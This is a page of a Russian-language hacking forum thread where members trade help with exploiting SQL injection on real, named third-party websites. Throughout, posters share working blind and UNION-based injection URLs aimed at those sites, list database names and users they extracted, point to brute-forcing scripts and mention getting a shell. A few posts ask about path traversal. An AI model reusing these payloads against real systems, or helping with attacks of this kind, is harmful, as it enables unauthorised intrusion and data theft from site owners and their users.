Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    2 diznt

    blind sql injection

    version: 4.1.22-log
    database : frutony3_fn
    user : frutony3_fn@localhost



    http://frutonyanya.ru/php/news.php?n=25&c=49+AND+ASCII(SUBSTRING((select+user()),1,1))>x
     
    1 person likes this.
  2. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    192
    Likes Received:
    675
    Reputations:
    333
    https://forum.antichat.ru/showpost.php?p=966458&postcount=3908
    советую забить на скулю доступа к information_schema нет
    //add а ну да не обратил внимания на ветку=) 4.1
     
    #5642 l1ght, 1 Mar 2009
    Last edited: 1 Mar 2009
    2 people like this.
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Где можно почитать о блинд скуль инъекциях?
     
  4. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    [MySQL/SQL-inj]

    Там же скрипты для вывода всех записей из таблицы, брута имен столбцов и полей.

    Вообще очень и очень полезная вещь, прошу особенно обратить внимание на неё - случаи когда права на файлы у пользователя БД есть, но кавычки экранируются более чем частые.
    И как показывает практика найти, читая сорцы найти, уязвимый запрос, данные из которого подставляются в другой запрос, более чем реально, а результат шелл.
    Так же имейте ввиду что иногда, данные из запроса подставляются в функции include() или eval() - тут надо следить за выводом ошибок при SQL инъекции.


    Там же можно найти словари для брута имён таблиц и колонок, а вот и ещё:


    Мануалы с офф сайта (English), по версиям: 3.23, 4.0, 4.1 5.0 5.1 6.0

    by Grey
     
    1 person likes this.
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://arainia.com/software/gizmo/overview.php?nID=4
    Как эту расскрутить... Остановился на 20 столбцах, пишет что мало...
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    2 mailbrush
    по мне , так опять блинд


    Version : 4.1.22-standard
    Database : arainia_members
    User : arainia_members@localhost



    http://arainia.com/software/gizmo/overview.php?nID=4 AND ASCII(SUBSTRING((select+user() ),1,1))=x/
     
    #5646 Gorev, 1 Mar 2009
    Last edited: 1 Mar 2009
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Gorev, эм.. где там вывод?
    фух, а это что? тут не выводит
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    2 mailbrush

    вывода тм нет, на то она и есть слепая скуля что вывода нет.
    http://www.eu-gateway.eu/go.php?nID=-9' тоже слепуха, читай про блинды
     
  9. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Только что прочитал... Вроде подставил, но всеравно та же ошибка - Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource. Подставлял:
    Code:
    http://www.eu-gateway.eu/go.php?nID=-9+OR+nID=IF(ASCII(SUBSTRING((SELECT+USER()),1,1)=254,1,0)
    Что не так?
     
  10. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.eu-gateway.eu/go.php?nID=2+and+1=if(substring((select+version()),3,1)=0,1,(select+1+union+select+2))/*
    версия 4.1
     
    1 person likes this.
  11. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://arainia.com/software/gizmo/overview.php?nID=-4+union+select+version(),2,3--
    Вывод в исходной.
     
  12. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    530
    Likes Received:
    494
    Reputations:
    99
    Code:
    http://www.tv3russia.ru/mysticism/programs/programs_310/foto/photo.php?id4[]=1329
    Вроде бы и скуля... а вроде и нет... подскажите)
     
  13. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    602
    Likes Received:
    485
    Reputations:
    176
    Нет.
     
  14. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    530
    Likes Received:
    494
    Reputations:
    99
    Хм, а почему тогда
     
  15. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    565
    Likes Received:
    309
    Reputations:
    27
    Походу когда делаешь массивом проходится проверка на пустое значения, ну а потом например идет int() от масива даст '' и в гверю идет пустое значения, возможно.
     
  16. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    602
    Likes Received:
    485
    Reputations:
    176
    Это ошибка скул запроса. id4=1329 определяет переменную id4 и присваивает ей значение. id4[]=1329 определяет массив id4[0]=1329. Далее идет запрос примерно такой
    select count(*) as CNT from VOICES_TO_PHOTO where CLIENT_ID='ip' and PHOTO_ID=id4

    в первом случае это возвращает правильный результат. Во втором случае подставляется массив и вызывается ошибка.
     
  17. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    530
    Likes Received:
    494
    Reputations:
    99
    ну вот, таки скуля) Раскрутить ее можно?
     
  18. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    602
    Likes Received:
    485
    Reputations:
    176
    не скуля)
    переменная id4 хорошо фильтруется. Тут фишка в том, что при id4[]=1329 в запрос идёт строка 'Array' и значение 1329 записывается в переменную id4[0].
     
    1 person likes this.
  19. dunno

    dunno New Member

    Joined:
    21 Feb 2009
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Можно ли пролистать другой диск-драйв через подобие командной строки командой dir? К примеру программа находитцо в папке C:\samas\sam2\, значит к корню: "dir ./../../../ /". Использование: "dir {путь} {тип поиска}". Тупое прописывание буквы диска не проканает, можно использовать только короткие имена (6n~1).
    Не уверен что это возможно, но мало ли кто дельное предложит. :)
     
    #5659 dunno, 2 Mar 2009
    Last edited: 2 Mar 2009
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Вот... Все выводит, кроме колонок
    ищ таблы юзер... Почему?
     
Loading...
Thread Status:
Not open for further replies.